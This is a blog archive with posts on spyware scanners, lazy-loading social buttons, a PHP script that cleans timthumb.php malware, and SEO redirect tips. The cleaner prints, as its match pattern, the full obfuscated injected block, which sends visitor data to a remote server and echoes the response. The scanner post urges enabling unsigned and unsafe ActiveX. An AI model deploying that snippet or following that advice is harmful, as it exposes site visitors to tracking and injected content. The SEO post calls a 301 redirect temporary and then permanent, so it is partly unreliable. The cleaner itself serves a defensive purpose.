Saturday, April 07, 2012

Online spyware removal


(part of the Windows course :)

Note: if you don't have access to Windows Safe Mode, which is essential when cleaning viruses, I suggest that before scanning with these applications you download Hitman Pro and run it from a flash drive. If that doesn't succeed, try a bootable CD running Kaspersky, then launch the WindowsUnlocker feature. Only then can you continue with MalwareBytes.
Here is a list of free online anti-spyware tools that will help you clean up a PC from spyware, trojans and viruses. Compared with standard anti-virus software they have the following:

  • Advantages:
    - no need for application installation on your computer.
    - online scanners use the latest antivirus definitions.
  • Disadvantages:
    - some online scanners like Kaspersky online scanner and Panda Active Scan list only viruses they find without cleaning them. (Panda Active scan actually only finds viruses but cleans up spyware). This way they could be used for a system check only.
The following compact anti-spyware tools have a small size that will not affect your system's performance, and will not slow down your application loading time. So give them a try and don't forget to update the definitions first!
  • A-squared Web Malware Scanner
  • SuperAntiSpyware makes a sophisticated spyware analysis on your system
  • Anti-Spyware for the web from TrendMicro HouseCall
  • Microsoft Security Essentials
  • Norton's Symantec on-line security scan and virus detection 
  • F-Secure Online Virus Scanner
Before you scan your PC
Some of the online scanners require specific access to run. Under Windows, if you notice the Information Bar at the upper part of the screen, click on it and select Enable, Install or Run the file from the context menu.

Some online scanners work in the Internet Explorer browser only and require ActiveX controls to be turned on. You can enable ActiveX from the Tools menu in Internet Explorer:

1. Go to Internet Options.
2. Then on the Security tab, click on Default Level.

Another way of enabling ActiveX is to add the antivirus program's website to your Trusted sites:
1. Go to Internet Options -> Security Tab -> Trusted sites.
2. For the Security Level for this zone click on the button Custom level...
3. Fill in the full address of the website you want to have access to in the input field Add this website into this zone and uncheck Require server verification (https:) for all sites in this zone.
4. Check the availability of ActiveX scripting in Internet Explorer. In the field Security level for this zone click on the Custom level button and under ActiveX controls and plugins enable:

  • Automatic Prompting for ActiveX controls
  • Download Signed ActiveX controls
  • Download Unsigned ActiveX controls
  • Initialize and run ActiveX controls that are not marked as safe
  • Run ActiveX controls and plug-ins
  • Script ActiveX controls marked safe for scripting

Virus removal tools
If you know exactly which virus has infected your PC, you can browse through the major antivirus providers' databases and download tools that will specifically clean up your computer at a much higher speed. Some virus variants are not so easy to clean up, so you can try downloading several different cleaning utilities in order to have a broader spectrum for catching the intruder. These tools need to be downloaded and run as standalone applications:

And if you think that you have an infected file you can always send it for a check to:
Protection tool
SpywareBlaster - prevents the installation of spyware, adware, dialers, browser hijackers, and other potentially unwanted programs. It will also protect your Internet browser.

  1. Under “Quick Tasks” click “Download Latest Protection Updates”.
  2. Click the “Check for Updates” button.
  3. After updating, click “Protection” near the top.
  4. Under “Quick Tasks” click “Enable All Protection”.

How to save time?
Instead of testing all the on-line scanners you can first run a quick check & clean procedure with Dr.Web's CureIt. Run the application and go to Options -> Change settings. Choose the "Scan" tab and uncheck "Heuristic analysis". Then click on the Start Scanning button.

Last but not least, you must definitely try the great free anti-malware scanner/cleaner offered by MalwareBytes:

Happy cleaning!

Saturday, November 26, 2011

Load Facebook like, Google+ social buttons on mouse over

The following two techniques will definitely speed up your web page loading times if you want to use social sharing buttons.
The action performed by the first technique is simple:
1) Do not load or render third-party resources (i.e. external JavaScript files) until the visitor places the mouse over the social buttons.
2) Mimic the social buttons' appearance with simple images.
3) When the user hovers over the buttons, the temporary images are hidden and replaced by the original buttons from Google, Facebook, LinkedIn, etc.
Here is more info on the subject:

First place a div tag with id = sharebox and put simple .png mock-up graphics of the social buttons inside.
<div id="sharebox"> <img src="social.png" /> </div>

<span id="social_share"><img src="images/user.gif" /></span>
<a href="" class="twitter-share-button" data-count="horizontal"></a>
<div class="g-plusone" data-annotation="inline" data-size="medium" data-width="120"></div>
<script type="IN/Share" data-counter="right"></script>
<div class="fb-like" data-layout="button_count" data-send="false" data-show-faces="false" data-width="90"></div>

Then add this simple JavaScript code below the markup:

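document.getElementById('social_share').addEventListener("mouseenter", load_scripts);

function load_js_script(src, call_back) {
    var scriptTag = document.createElement("script");
    scriptTag.type = "text/javascript";
    scriptTag.src = src;
    scriptTag.async = true;
    scriptTag.onload = function () {
        if (typeof call_back != 'undefined') {
            call_back();
        }
    };
    document.getElementsByTagName("head")[0].appendChild(scriptTag);
}

// The widget script URLs are not preserved on this page; the "//" strings mark where they go.
// Calls marked "assumed" stand in for lines that are missing from the listing.
function load_scripts(e) {
    // assumed target: clear the placeholder image inside #social_share (step 3 above)
    document.getElementById('social_share').innerHTML = '';
    if (typeof twttr != 'undefined') {
        twttr.widgets.load(); // assumed: re-render when the library is already loaded
    } else {
        load_js_script("//");
    }
    if (typeof FB != 'undefined') {
        FB.init({
            status: true,
            cookie: true,
            xfbml: true
        });
    } else {
        load_js_script("//", function () {
            FB.init({
                status: true,
                cookie: true,
                xfbml: true
            });
        });
    }
    if (typeof gapi != 'undefined') {
        var gplus = document.getElementsByClassName('g-plusone');
        for (var i = 0; i < gplus.length; i++) {
            gapi.plusone.render(gplus[i]); // assumed
        }
    } else {
        load_js_script("//");
    }

    if (typeof IN != 'undefined') {
        IN.parse(); // assumed
    } else {
        load_js_script("//");
    }
}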
A second and faster way of loading those buttons is to use specially styled iframes. This way the third-party libraries such as all.js or plusone.js are not loaded into our own page, which speeds up the code significantly. Here is how:

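document.getElementById('social_share').addEventListener("mouseenter", load_scripts);

function load_scripts() {
    // The frame URLs are not preserved on this page; clearing the placeholder is an assumed target.
    document.getElementById('social_share').innerHTML = '';
    makeIframe("", "google_slot");
    makeIframe("", "facebook_slot");
}

function makeIframe(url, call_id) {
    var iframe = document.createElement('iframe');
    iframe.id = call_id;
    iframe.src = url;
    // assumed: the frame is attached where the placeholder image was
    document.getElementById('social_share').appendChild(iframe);
}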

P.S. These are just sample images. Please use/create placeholder images of your own taste.
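
The iframe-on-hover variant with the checks a page embedding third-party widgets usually wants, as an added example that is not part of the original post: frames are created once, only for https URLs on an allowlisted host, and with a sandbox attribute. The hosts, URLs, function names and the sandbox token list are assumptions (placeholders, not the real widget endpoints).

```javascript
// Added example: placeholder hosts, not the real widget endpoints.
const ALLOWED_HOSTS = new Set(["widgets.example.com", "buttons.example.net"]);

// Accept only absolute https URLs on an allowlisted host.
function isAllowedWidgetUrl(url) {
  try {
    const u = new URL(url);
    return u.protocol === "https:" && ALLOWED_HOSTS.has(u.hostname);
  } catch (err) {
    return false; // relative, empty or malformed URL
  }
}

// Build one widget frame. The sandbox token list is an assumption; trim it
// to what the embedded button actually needs.
function makeSandboxedIframe(doc, url, slotId) {
  const iframe = doc.createElement("iframe");
  iframe.id = slotId;
  iframe.src = url;
  iframe.setAttribute("sandbox", "allow-scripts allow-same-origin allow-popups");
  iframe.setAttribute("referrerpolicy", "no-referrer");
  return iframe;
}

// Swap the placeholder image for the real widgets on the first hover only.
// Returns the handler so it can also be bound to focus or click.
function armLazyButtons(doc, containerId, widgets) {
  const box = doc.getElementById(containerId);
  let loaded = false;
  function onFirstHover() {
    if (loaded) return 0;
    loaded = true;
    const ok = widgets.filter((w) => isAllowedWidgetUrl(w.url));
    if (ok.length === 0) return 0; // keep the mock-up if nothing passes
    box.innerHTML = ""; // drop the mock-up image
    ok.forEach((w) => box.appendChild(makeSandboxedIframe(doc, w.url, w.slot)));
    return ok.length; // number of frames actually inserted
  }
  box.addEventListener("mouseenter", onFirstHover, { once: true });
  return onFirstHover;
}

// Constructed sample configuration; in a browser this wires up #social_share.
const WIDGETS = [
  { url: "https://widgets.example.com/like?href=https%3A%2F%2Fsite.example%2F", slot: "facebook_slot" },
  { url: "https://buttons.example.net/plusone", slot: "google_slot" },
];
if (typeof document !== "undefined") armLazyButtons(document, "social_share", WIDGETS);
```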

Friday, October 14, 2011

Timthumb.php exploit cleaner

After spending a day manually cleaning about 300+ leftovers of the newest version of the timthumb.php malware, here is a working exploit cleaner that you can use to check your whole web server for vulnerabilities and automatically clean up its mess:
Usage: just save and run the following .php file from the root directory of your domain.
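<?php
// Walk every directory below the parent of this script, breadth-first.
$path[] = '../*';
while (count($path) != 0) {
    $v = array_shift($path);
    foreach (glob($v) ?: array() as $item) {
        if (is_dir($item)) {
            $path[] = $item . '/*';
        } elseif (is_file($item)) {
            // Only index.php files are checked for the injected block.
            if (preg_match('/index\.php/is', $item)) {
                echo "processing $item - last modified at: " . date("F d Y H:i:s.", filemtime($item));
                disinfect($item);
                echo "<br /> ";
            }
        }
    }
}

// Undo the htmlspecialchars() encoding that disinfect() applies while matching.
function restore_hsc($val){
    $val = str_replace('&ouml;', 'ö', $val);
    $val = str_replace('&auml;', 'ä', $val);
    $val = str_replace('&uuml;', 'ü', $val);
    $val = str_replace('&lt;', '<', $val);
    $val = str_replace('&gt;', '>', $val);
    $val = str_replace('&quot;', '"', $val);
    // Decode &amp; last so entities already present in the file are not decoded twice.
    $val = str_replace('&amp;', '&', $val);
    return $val;
}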
function disinfect($filename) {
    $pattern='<?php $_F=__FILE__;$_X=\'Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+\';eval(base64_decode(\'JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==\'));$ua = urlencode(strtolower($_SERVER[\'HTTP_USER_AGENT\']));$ip = $_SERVER[\'REMOTE_ADDR\'];$host = $_SERVER[\'HTTP_HOST\'];$uri = urlencode($_SERVER[\'REQUEST_URI\']);$ref = urlencode($_SERVER[\'HTTP_REFERER\']);$url = $url.\'?ip=\'.$ip.\'&host=\'.$host.\'&uri=\'.$uri.\'&ua=\'.$ua.\'&ref=\'.$ref; $tmp = file_get_contents($url); echo $tmp; ?>';
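    // ENT_COMPAT leaves single quotes unencoded, which restore_hsc() relies on.
    $pattern = trim(htmlspecialchars($pattern, ENT_COMPAT)); //prepare pattern
    $lines = file($filename, FILE_IGNORE_NEW_LINES);
    $found = 0;
    for ($i = 0; $i < sizeof($lines); $i++) {
        $current_line = htmlspecialchars(trim($lines[$i]), ENT_COMPAT);
        if (strstr($current_line, $pattern)) {
            $lines[$i] = str_replace($pattern, "", $current_line);
            $lines[$i] = preg_replace('/\s\s+/', ' ', $lines[$i]);
            $lines[$i] = restore_hsc($lines[$i]); // write the rest of the line back unencoded
            $found++;
        }
    }
    $lines = array_values($lines);
    if ($found > 0) {
        $file = fopen($filename, "w");
        fwrite($file, implode("\n", $lines));
        fclose($file);
        echo " <span style=\"color:red;\"> is infected. Cured: $found injected objects</span> <br />";
    } else {
        echo "clean <br /> ";
    }
}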
P.S. don't forget to share if the script has helped you :)

Monday, July 19, 2010

SEO iframes and redirects

Hidden redirects
Do you know the difference between these two custom not-found error pages? (Where to find them? Hint: look in your .htaccess file.)
ErrorDocument 404

ErrorDocument 404 error404.php
It appears that the first line returns a 302 Found header code and then redirects to your 404 page, which is a really bad thing from an SEO standpoint and gets penalized. The second line gives you the normal 404 page, returning a proper 404 header code.

Too many 301 redirects
Can you recognize this code?
RewriteRule (.*)$1 [R=301,L] 
You may think that it is OK to redirect your old domain to a new one (in case a Panda penalty has been applied) via a 301 temporary header redirect. But what happens if the old domain already has some kind of penalty applied? Well, it automatically transfers to your new domain because, as you might have noticed, 301 is actually a PERMANENT redirect and transfers all the weight from the previous domain. So go check and fix those two cases, and be really careful!

Usage of iframes between subdomains
On one website (~500 pages) with over 300 pages indexed in Google, I used an iframe linking to another sub-domain in order to display relevant content. When I removed the iframe, almost immediately, in less than 24 hours, my indexed results grew from 300 to 360.
But why?
I started searching on the forums and it appeared that a Google penalty filter was triggered by such heavy usage of iframes (mistakenly taken as a poisoning attack). Here is a short explanation from Matt Cutts on this:
"Essentially, our search algorithm saw a large area on the blog that was due to an IFRAME included from another site and that looked spammy to our automatic classifier."

Remove all the iframes that you have or replace them with ajax calls or just static HTML content.
Wait a few days and run: site: to see the difference in the results!

Good luck!
